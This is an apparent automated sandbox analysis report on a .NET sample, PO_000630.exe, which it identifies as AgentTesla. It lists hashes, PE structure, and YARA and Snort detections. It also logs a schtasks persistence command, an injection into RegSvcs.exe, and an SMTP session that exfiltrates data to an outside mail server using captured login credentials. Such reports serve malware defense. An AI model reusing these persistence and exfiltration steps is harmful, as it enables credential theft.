                                                                  SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                                                  Malicious:true
                                                                  Preview: ..127.0.0.1
                                                                  \Device\ConDrv
                                                                  Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1141
                                                                  Entropy (8bit):4.44831826838854
                                                                  Encrypted:false
                                                                  SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                                                  MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                                                  SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                                                  SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                                                  SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                                                  Malicious:false
                                                                  Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.310867886556554
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:PO_000630.exe
                                                                  File size:768512
                                                                  MD5:1fb20b0d0b5817e8485171b8271d2709
                                                                  SHA1:132da2b67821a3e8168088ecb74e5a5c05df9b6c
                                                                  SHA256:05c744b20df523ca0ebd41c0b9f43474fdf52754dd65b87bd5c0cf32cc2e8b88
                                                                  SHA512:aa4da61e0153432f8206a33d5c835efd348a481776f8043e7704e36a19ab8740947d27b95ef6c2d25de98fe8750e82157a14853c352b3aac925f869dccaf0734
                                                                  SSDEEP:12288:4qxxoLLoS60/K7yh0R8wRLyVKRpGnBo0iL5PgQiaJEDmGEXUqjmPNL:4soLAR84RpGnBotPgQzJCPPNL
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4bce92
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x9ECF88B1 [Sat Jun 6 23:24:33 2054 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbce400x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x59c.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xbce240x1c.text
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xbae980xbb000False0.733015907002data7.31245662068IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xbe0000x59c0x600False0.419921875data4.06581710335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xc00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_VERSION0xbe0900x30cdata
                                                                  RT_MANIFEST0xbe3ac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2019
                                                                  Assembly Version1.0.0.0
                                                                  InternalNameQ2prfuT.exe
                                                                  FileVersion1.0.0.0
                                                                  CompanyName
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNamePencil
                                                                  ProductVersion1.0.0.0
                                                                  FileDescriptionPencil
                                                                  OriginalFilenameQ2prfuT.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  05/12/21-19:45:28.964520TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49743587192.168.2.6166.62.7.52

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 12, 2021 19:45:26.182996035 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:26.457885981 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:26.458092928 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:26.990716934 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:26.991200924 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:27.266184092 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:27.267688036 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:27.543327093 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:27.544060946 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:27.852607012 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:27.856221914 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:28.132860899 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:28.136817932 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:28.413588047 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:28.436723948 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:28.713166952 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:28.713337898 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:28.773175955 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:28.964519978 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:28.964646101 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:28.965245008 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:28.965313911 CEST49743587192.168.2.6166.62.7.52
                                                                  May 12, 2021 19:45:29.239454031 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:29.240066051 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:29.249965906 CEST58749743166.62.7.52192.168.2.6
                                                                  May 12, 2021 19:45:29.296448946 CEST49743587192.168.2.6166.62.7.52

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 12, 2021 19:43:36.270690918 CEST5507453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:36.320410013 CEST53550748.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:37.419264078 CEST5451353192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:37.471031904 CEST53545138.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:38.549230099 CEST6204453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:38.600792885 CEST53620448.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:38.792248964 CEST6379153192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:38.858958006 CEST53637918.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:39.737270117 CEST6426753192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:39.788866997 CEST53642678.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:41.024382114 CEST4944853192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:41.074918032 CEST53494488.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:42.282147884 CEST6034253192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:42.330967903 CEST53603428.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:44.228368998 CEST6134653192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:44.277146101 CEST53613468.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:45.641657114 CEST5177453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:45.698707104 CEST53517748.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:49.027245045 CEST5602353192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:49.079438925 CEST53560238.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:50.215898037 CEST5838453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:50.266100883 CEST53583848.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:51.367177010 CEST6026153192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:51.418013096 CEST53602618.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:52.559334040 CEST5606153192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:52.610954046 CEST53560618.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:53.723141909 CEST5833653192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:53.773047924 CEST53583368.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:54.775402069 CEST5378153192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:54.824168921 CEST53537818.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:55.638726950 CEST5406453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:55.690330982 CEST53540648.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:56.464337111 CEST5281153192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:56.514997959 CEST53528118.8.8.8192.168.2.6
                                                                  May 12, 2021 19:43:57.283165932 CEST5529953192.168.2.68.8.8.8
                                                                  May 12, 2021 19:43:57.334901094 CEST53552998.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:12.060388088 CEST6374553192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:12.120662928 CEST53637458.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:31.173110962 CEST5005553192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:31.271575928 CEST53500558.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:33.387186050 CEST6137453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:33.447758913 CEST53613748.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:34.210469007 CEST5033953192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:34.271997929 CEST53503398.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:34.863656998 CEST6330753192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:34.926225901 CEST53633078.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:35.362145901 CEST4969453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:35.411448956 CEST53496948.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:35.630618095 CEST5498253192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:35.697791100 CEST53549828.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:36.008831024 CEST5001053192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:36.072331905 CEST53500108.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:36.828140974 CEST6371853192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:36.879993916 CEST53637188.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:37.540389061 CEST6211653192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:37.602407932 CEST53621168.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:39.692709923 CEST6381653192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:39.749856949 CEST53638168.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:40.583658934 CEST5501453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:40.635402918 CEST53550148.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:41.290932894 CEST6220853192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:41.349877119 CEST53622088.8.8.8192.168.2.6
                                                                  May 12, 2021 19:44:50.770332098 CEST5757453192.168.2.68.8.8.8
                                                                  May 12, 2021 19:44:50.828927994 CEST53575748.8.8.8192.168.2.6
                                                                  May 12, 2021 19:45:13.954866886 CEST5181853192.168.2.68.8.8.8
                                                                  May 12, 2021 19:45:14.016514063 CEST53518188.8.8.8192.168.2.6
                                                                  May 12, 2021 19:45:19.626351118 CEST5662853192.168.2.68.8.8.8
                                                                  May 12, 2021 19:45:19.683324099 CEST53566288.8.8.8192.168.2.6
                                                                  May 12, 2021 19:45:22.027666092 CEST6077853192.168.2.68.8.8.8
                                                                  May 12, 2021 19:45:22.098799944 CEST53607788.8.8.8192.168.2.6
                                                                  May 12, 2021 19:45:26.085819006 CEST5379953192.168.2.68.8.8.8
                                                                  May 12, 2021 19:45:26.152215958 CEST53537998.8.8.8192.168.2.6

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  May 12, 2021 19:45:26.085819006 CEST192.168.2.68.8.8.80xd39aStandard query (0)mail.sarojprints.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  May 12, 2021 19:45:26.152215958 CEST8.8.8.8192.168.2.60xd39aNo error (0)mail.sarojprints.com166.62.7.52A (IP address)IN (0x0001)

                                                                  SMTP Packets

                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                  May 12, 2021 19:45:26.990716934 CEST58749743166.62.7.52192.168.2.6220-sg2plcpnl0022.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 12 May 2021 10:45:26 -0700
                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                  220 and/or bulk e-mail.
                                                                  May 12, 2021 19:45:26.991200924 CEST49743587192.168.2.6166.62.7.52EHLO 888683
                                                                  May 12, 2021 19:45:27.266184092 CEST58749743166.62.7.52192.168.2.6250-sg2plcpnl0022.prod.sin2.secureserver.net Hello 888683 [84.17.52.78]
                                                                  250-SIZE 52428800
                                                                  250-8BITMIME
                                                                  250-PIPELINING
                                                                  250-AUTH PLAIN LOGIN
                                                                  250-STARTTLS
                                                                  250 HELP
                                                                  May 12, 2021 19:45:27.267688036 CEST49743587192.168.2.6166.62.7.52AUTH login cHBjQHNhcm9qcHJpbnRzLmNvbQ==
                                                                  May 12, 2021 19:45:27.543327093 CEST58749743166.62.7.52192.168.2.6334 UGFzc3dvcmQ6
                                                                  May 12, 2021 19:45:27.852607012 CEST58749743166.62.7.52192.168.2.6235 Authentication succeeded
                                                                  May 12, 2021 19:45:27.856221914 CEST49743587192.168.2.6166.62.7.52MAIL FROM:<ppc@sarojprints.com>
                                                                  May 12, 2021 19:45:28.132860899 CEST58749743166.62.7.52192.168.2.6250 OK
                                                                  May 12, 2021 19:45:28.136817932 CEST49743587192.168.2.6166.62.7.52RCPT TO:<ppc@sarojprints.com>
                                                                  May 12, 2021 19:45:28.413588047 CEST58749743166.62.7.52192.168.2.6250 Accepted
                                                                  May 12, 2021 19:45:28.436723948 CEST49743587192.168.2.6166.62.7.52DATA
                                                                  May 12, 2021 19:45:28.713337898 CEST58749743166.62.7.52192.168.2.6354 Enter message, ending with "." on a line by itself
                                                                  May 12, 2021 19:45:28.965313911 CEST49743587192.168.2.6166.62.7.52.
                                                                  May 12, 2021 19:45:29.249965906 CEST58749743166.62.7.52192.168.2.6250 OK id=1lgsvI-0044I2-HP

                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:19:43:44
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\PO_000630.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\PO_000630.exe'
                                                                  Imagebase:0x900000
                                                                  File size:768512 bytes
                                                                  MD5 hash:1FB20B0D0B5817E8485171B8271D2709
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:19:43:50
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wDToQaa' /XML 'C:\Users\user\AppData\Local\Temp\tmp647A.tmp'
                                                                  Imagebase:0x910000
                                                                  File size:185856 bytes
                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:19:43:50
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff61de10000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:19:43:50
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:{path}
                                                                  Imagebase:0x520000
                                                                  File size:45152 bytes
                                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  General

                                                                  Start time:19:44:21
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                                                                  Imagebase:0x640000
                                                                  File size:45152 bytes
                                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Antivirus matches:
                                                                  • Detection: 0%, Metadefender, Browse
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:high

                                                                  General

                                                                  Start time:19:44:21
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff61de10000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:19:44:29
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                                                                  Imagebase:0x9d0000
                                                                  File size:45152 bytes
                                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Start time:19:44:29
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff61de10000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >